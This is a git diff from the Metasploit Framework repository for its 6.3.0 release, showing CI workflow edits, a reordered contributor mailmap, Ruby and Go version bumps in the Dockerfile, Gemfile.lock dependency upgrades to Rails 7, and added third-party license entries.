Land #17553 , Framework 6.3.0

Land #17291 , Add support for rails 7
Land #17460 , add support for feature kerberos authentication
2023-01-26 13:30:27 -06:00 · 2023-01-26 11:50:29 -06:00 · 2023-01-26 17:47:27 +00:00 · 2023-01-26 17:02:02 +00:00 · 2023-01-26 16:29:11 +00:00 · 2023-01-26 11:23:05 -05:00
563 changed files with 88485 additions and 7188 deletions
@@ -55,5 +55,4 @@ jobs:
      - name: build
        working-directory: docs
        run: |
-          bundle exec ruby build.rb
          bundle exec ruby build.rb --production
@@ -64,18 +64,18 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
-          - 3.0
-          - 3.1
+          - '2.7'
+          - '3.0'
+          - '3.1'
        os:
          - ubuntu-20.04
          - ubuntu-latest
        exclude:
-          - { os: ubuntu-latest, ruby: 2.7 }
-          - { os: ubuntu-latest, ruby: 3.0 }
+          - { os: ubuntu-latest, ruby: '2.7' }
+          - { os: ubuntu-latest, ruby: '3.0' }
        include:
          - os: ubuntu-latest
-            ruby: 3.1
+            ruby: '3.1'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -100,7 +100,7 @@ jobs:
          BUNDLE_WITHOUT: "coverage development pcap"
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true

      - name: Create database
@@ -1,45 +1,20 @@
-acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
-adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
 adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
-bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
-bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
 cgranleese-r7 <cgranleese-r7@github>   <christopher_granleese@rapid7.com>
 dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
 dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
-ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
 gwillcox-r7 <gwillcox-r7@github>       <Grant_Willcox@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
-jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>         <jqian@rapid7.com>
 jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
-lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
 mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
-sjanusz-r7 <sjanusz-r7@github>         <simon_janusz@rapid7.com>
 smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
 space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
-tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
-wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -48,9 +23,15 @@ wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.

+acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
+acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
+acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
+adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
 asoto-r7 <asoto-r7@github>             <aaron_soto@rapid7.com>
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
+bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
+bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 bpatterson-r7 <bpatterson-r7@github>   <bpatterson@rapid7.com>
 bpatterson-r7 <bpatterson-r7@github>   <Brian_Patterson@rapid7.com>
@@ -58,6 +39,7 @@ brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
+bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
@@ -75,6 +57,7 @@ DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmai
 dmaloney-r7 <dmaloney-r7@github>       <David_Maloney@rapid7.com>
 dmaloney-r7 <dmaloney-r7@github>       <DMaloney@rapid7.com>
 dmohanty-r7 <dmohanty-r7@github>       <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 egypt <egypt@github>                   <egypt@metasploit.com> # aka egypt
@@ -97,6 +80,8 @@ hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
 jabra <jabra@github>                   <jabra@spl0it.org>
+jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -105,6 +90,8 @@ jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
 jhart-r7 <jhart-r7@github>             <jon_hart@rapid7.com>
+jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
+jinq102030 <jinq102030@github>         <jqian@rapid7.com>
 joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
@@ -123,6 +110,8 @@ lsanchez-r7 <lsanchez-r7@github>       <lance@AUS-MAC-1041.local>
 lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez+github@gmail.com>
 lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@gmail.com>
 lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@rapid7.com>
+lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
+lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
@@ -137,6 +126,7 @@ nullbind <nullbind@github>             nullbind <scott.sutherland@nullbind.com>
 nullbind <nullbind@github>             Scott Sutherland <scott.sutherland@nullbind.com>
 ohdae <ohdae@github>                   ohdae <bindshell@live.com>
 oj <oj@github>                         <oj@buffered.io>
+pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
 r3dy <r3dy@github>                     Royce Davis <r3dy@Royces-MacBook-Pro.local>
 r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.local>
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
@@ -155,6 +145,10 @@ scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.u
 sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
 sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
 sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+sjanusz-r7 <sjanusz-r7@github>         <simon_janusz@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 smashery <smashery@github>             Ashley Donaldson <smashery@gmail.com>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
@@ -163,6 +157,7 @@ stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
 tatanus <tatanus@github>               <adam_compton@rapid7.com>
+tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <techpeace@gmail.com>
 timwr <timwr@github>                   <timrlw@gmail.com>
@@ -170,12 +165,15 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 void-in <void-in@github>               void_in <root@localhost.localdomain>
 void-in <void-in@github>               void-in <root@localhost.localdomain>
 void-in <void-in@github>               <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
+wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
+wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
+wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>

 # Aliases for utility author names. Since they're fake, typos abound
@@ -185,4 +183,4 @@ Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
 Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
 Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
-Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
@@ -1 +1 @@
-3.0.2
+3.0.5
@@ -1,4 +1,4 @@
-FROM ruby:3.0.4-alpine3.15 AS builder
+FROM ruby:3.0.5-alpine3.15 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -43,13 +43,13 @@ RUN apk add --no-cache \
 ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.11.2.src.tar.gz && \
-    tar -zxf go1.11.2.src.tar.gz && \
-    rm go1.11.2.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.19.3.src.tar.gz && \
+    tar -zxf go1.19.3.src.tar.gz && \
+    rm go1.19.3.src.tar.gz && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.0.4-alpine3.15
+FROM ruby:3.0.5-alpine3.15
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -15,8 +15,7 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  # lock to version with 2.6 support until project updates
-  gem 'pry-byebug', '~> 3.9.0'
+  gem 'pry-byebug'
  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
  # Replaces the old lib/debug.rb and provides more features.
  gem 'debug', '>= 1.0.0'
@@ -1,17 +1,16 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.26)
-      actionpack (~> 6.0)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
+    metasploit-framework (6.3.0)
+      actionpack (~> 7.0)
+      activerecord (~> 7.0)
+      activesupport (~> 7.0)
      aws-sdk-ec2
      aws-sdk-iam
      aws-sdk-s3
      bcrypt
      bcrypt_pbkdf
      bson
-      concurrent-ruby (= 1.0.5)
      dnsruby
      ed25519
      em-http-request
@@ -30,7 +29,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.99)
+      metasploit-payloads (= 2.0.108)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.20)
      mqtt
@@ -52,6 +51,7 @@ PATH
      pg
      puma
      railties
+      rasn1
      rb-readline
      recog
      redcarpet
@@ -97,30 +97,29 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (6.1.7)
-      actionview (= 6.1.7)
-      activesupport (= 6.1.7)
-      rack (~> 2.0, >= 2.0.9)
+    actionpack (7.0.4.1)
+      actionview (= 7.0.4.1)
+      activesupport (= 7.0.4.1)
+      rack (~> 2.0, >= 2.2.0)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.7)
-      activesupport (= 6.1.7)
+    actionview (7.0.4.1)
+      activesupport (= 7.0.4.1)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.7)
-      activesupport (= 6.1.7)
-    activerecord (6.1.7)
-      activemodel (= 6.1.7)
-      activesupport (= 6.1.7)
-    activesupport (6.1.7)
+    activemodel (7.0.4.1)
+      activesupport (= 7.0.4.1)
+    activerecord (7.0.4.1)
+      activemodel (= 7.0.4.1)
+      activesupport (= 7.0.4.1)
+    activesupport (7.0.4.1)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-      zeitwerk (~> 2.3)
    addressable (2.8.1)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
@@ -128,40 +127,40 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.648.0)
-    aws-sdk-core (3.162.0)
+    aws-partitions (1.689.0)
+    aws-sdk-core (3.168.4)
      aws-eventstream (~> 1, >= 1.0.2)
-      aws-partitions (~> 1, >= 1.525.0)
-      aws-sigv4 (~> 1.1)
+      aws-partitions (~> 1, >= 1.651.0)
+      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.341.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-ec2 (1.356.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.71.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-iam (1.73.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.58.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-kms (1.61.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.115.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-s3 (1.117.2)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
    aws-sigv4 (1.5.2)
      aws-eventstream (~> 1, >= 1.0.2)
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
-    bindata (2.4.13)
+    bindata (2.4.14)
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
    coderay (1.1.3)
-    concurrent-ruby (1.0.5)
+    concurrent-ruby (1.1.10)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
-    debug (1.6.2)
-      irb (>= 1.3.6)
+    debug (1.7.1)
+      irb (>= 1.5.0)
      reline (>= 0.3.1)
    diff-lcs (1.5.0)
    dnsruby (1.61.9)
@@ -178,19 +177,19 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.11.0)
+    erubi (1.12.0)
    eventmachine (1.2.7)
    factory_bot (6.2.1)
      activesupport (>= 5.0.0)
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (2.23.0)
+    faker (3.1.0)
      i18n (>= 1.8.11, < 2)
-    faraday (2.6.0)
+    faraday (2.7.2)
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
-    faraday-net_http (3.0.1)
+    faraday-net_http (3.0.2)
    faraday-retry (2.0.0)
      faraday (~> 2.0)
    faye-websocket (0.11.1)
@@ -215,27 +214,28 @@ GEM
    httpclient (2.8.3)
    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
-    io-console (0.5.11)
-    irb (1.4.2)
+    io-console (0.6.0)
+    irb (1.6.2)
      reline (>= 0.3.0)
-    jmespath (1.6.1)
+    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.6.2)
+    json (2.6.3)
    little-plugger (1.1.4)
    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.19.0)
+    loofah (2.19.1)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    memory_profiler (1.0.0)
+    memory_profiler (1.0.1)
    metasm (1.0.5)
-    metasploit-concern (4.0.5)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-credential (5.0.9)
+    metasploit-concern (5.0.0)
+      activemodel (~> 7.0)
+      activesupport (~> 7.0)
+      railties (~> 7.0)
+      zeitwerk
+    metasploit-credential (6.0.1)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -245,25 +245,25 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (4.0.6)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-payloads (2.0.99)
-    metasploit_data_models (5.0.5)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
+    metasploit-model (5.0.0)
+      activemodel (~> 7.0)
+      activesupport (~> 7.0)
+      railties (~> 7.0)
+    metasploit-payloads (2.0.108)
+    metasploit_data_models (6.0.1)
+      activerecord (~> 7.0)
+      activesupport (~> 7.0)
      arel-helpers
      metasploit-concern
      metasploit-model (>= 3.1)
      pg
-      railties (~> 6.0)
-      recog (~> 2.0)
+      railties (~> 7.0)
+      recog
      webrick
    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
-    mini_portile2 (2.8.0)
-    minitest (5.16.3)
+    mini_portile2 (2.8.1)
+    minitest (5.17.0)
    mqtt (0.5.0)
    msgpack (1.6.0)
    multi_json (1.15.0)
@@ -271,15 +271,15 @@ GEM
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
    net-ldap (0.17.1)
-    net-protocol (0.1.3)
+    net-protocol (0.2.1)
      timeout
-    net-smtp (0.3.2)
+    net-smtp (0.3.3)
      net-protocol
    net-ssh (7.0.1)
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.9)
+    nokogiri (1.13.10)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -292,51 +292,54 @@ GEM
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.1.2.1)
+    parser (3.2.0.0)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
-    pdf-reader (2.10.0)
+    pdf-reader (2.11.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.4.4)
-    pry (0.13.1)
+    pg (1.4.5)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.9.0)
+    pry-byebug (3.10.1)
      byebug (~> 11.0)
-      pry (~> 0.13.0)
-    public_suffix (5.0.0)
-    puma (6.0.0)
+      pry (>= 0.13, < 0.15)
+    public_suffix (5.0.1)
+    puma (6.0.2)
      nio4r (~> 2.0)
-    racc (1.6.0)
-    rack (2.2.4)
-    rack-protection (3.0.2)
+    racc (1.6.2)
+    rack (2.2.5)
+    rack-protection (3.0.5)
      rack
    rack-test (2.0.2)
      rack (>= 1.3)
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.3)
-      loofah (~> 2.3)
-    railties (6.1.7)
-      actionpack (= 6.1.7)
-      activesupport (= 6.1.7)
+    rails-html-sanitizer (1.4.4)
+      loofah (~> 2.19, >= 2.19.1)
+    railties (7.0.4.1)
+      actionpack (= 7.0.4.1)
+      activesupport (= 7.0.4.1)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
+      zeitwerk (~> 2.5)
    rainbow (3.1.1)
    rake (13.0.6)
+    rasn1 (0.12.0)
+      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (2.3.23)
+    recog (3.0.3)
      nokogiri
    redcarpet (3.5.1)
-    regexp_parser (2.6.0)
-    reline (0.3.1)
+    regexp_parser (2.6.1)
+    reline (0.3.2)
      io-console (~> 0.5)
    rex-arch (0.1.14)
      rex-text
@@ -346,7 +349,7 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.28)
+    rex-core (0.1.29)
    rex-encoder (0.1.6)
      metasm
      rex-arch
@@ -376,30 +379,30 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.43)
+    rex-socket (0.1.45)
      rex-core
    rex-sslscan (0.1.8)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.46)
+    rex-text (0.2.47)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
    rkelly-remix (0.0.7)
-    rspec (3.11.0)
-      rspec-core (~> 3.11.0)
-      rspec-expectations (~> 3.11.0)
-      rspec-mocks (~> 3.11.0)
-    rspec-core (3.11.0)
-      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.1)
+    rspec (3.12.0)
+      rspec-core (~> 3.12.0)
+      rspec-expectations (~> 3.12.0)
+      rspec-mocks (~> 3.12.0)
+    rspec-core (3.12.0)
+      rspec-support (~> 3.12.0)
+    rspec-expectations (3.12.2)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-mocks (3.11.1)
+      rspec-support (~> 3.12.0)
+    rspec-mocks (3.12.2)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
+      rspec-support (~> 3.12.0)
    rspec-rails (6.0.1)
      actionpack (>= 6.1)
      activesupport (>= 6.1)
@@ -410,25 +413,25 @@ GEM
      rspec-support (~> 3.11)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.11.1)
-    rubocop (1.37.0)
+    rspec-support (3.12.0)
+    rubocop (1.42.0)
      json (~> 2.3)
      parallel (~> 1.10)
      parser (>= 3.1.2.1)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.22.0, < 2.0)
+      rubocop-ast (>= 1.24.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.22.0)
+    rubocop-ast (1.24.1)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.0)
+    ruby_smb (3.2.3)
      bindata
      openssl-ccm
      openssl-cmac
@@ -445,14 +448,15 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (3.0.2)
+    sinatra (3.0.5)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.2)
+      rack-protection (= 3.0.5)
      tilt (~> 2.0)
-    sqlite3 (1.5.3)
+    sqlite3 (1.5.4)
      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
+    strptime (0.2.5)
    swagger-blocks (3.0.0)
    thin (1.8.1)
      daemons (~> 1.0, >= 1.0.9)
@@ -460,17 +464,17 @@ GEM
      rack (>= 1, < 3)
    thor (1.2.1)
    tilt (2.0.11)
-    timecop (0.9.5)
-    timeout (0.3.0)
+    timecop (0.9.6)
+    timeout (0.3.1)
    ttfunk (1.7.0)
    tzinfo (2.0.5)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.5)
+    tzinfo-data (1.2022.7)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.3.0)
+    unicode-display_width (2.4.2)
    unix-crypt (1.3.0)
    warden (1.2.9)
      rack (>= 2.0.9)
@@ -479,7 +483,7 @@ GEM
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
-    windows_error (0.1.4)
+    windows_error (0.1.5)
    winrm (2.3.6)
      builder (>= 2.1.2)
      erubi (~> 1.8)
@@ -496,7 +500,7 @@ GEM
      webrick
    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.6.1)
+    zeitwerk (2.6.6)

 PLATFORMS
  ruby
@@ -508,7 +512,7 @@ DEPENDENCIES
  memory_profiler
  metasploit-framework!
  octokit
-  pry-byebug (~> 3.9.0)
+  pry-byebug
  rake
  redcarpet
  rspec-rails
@@ -15,54 +15,101 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

-Files: data/headers/windows/c_payload_util/beacon.h
-Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
-License: Apache 2.0
-
 Files: data/exploits/mysql/lib_mysqludf_sys_*.so
 Copyright: 2007  Roland Bouman
           2008-2010  Roland Bouman and Bernardo Damele A. G.
 License: LGPL-2.1
+Purpose: These files are used in exploits/multi/mysql/mysql_udf_payload.rb
+
+Files: data/headers/windows/c_payload_util/beacon.h
+Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
+License: Apache 2.0
+
+Files: data/jtr/*
+Copyright: Copyright 1996-2013 by Solar Designer
+License: GNU GPL 2.0
+
+Files: data/post/SharpHound.exe
+       data/post/powershell/SharpHound.ps1
+Copyright (C) 2016-2022 Specter Ops Inc.
+License: GNU GPL 3.0
+Purpose: These files are uploaded and executed by
+         post/windows/gather/bloodhound.

 Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause

-Files: external/source/exploits/IE11SandboxEscapes/*
-Copyright: James Forshaw, 2014
-License: GPLv3
+Files: data/webcam/api.js
+Copyright: Copyright 2013 Muaz Khan<@muazkh>.
+License: MIT

 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause

+Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
+Copyright: 2020 Johnny Shaw
+License: MIT
+
+Files: external/source/exploits/CVE-2018-8120/*
+Copyright: 2018
+License: GNU GPL 3
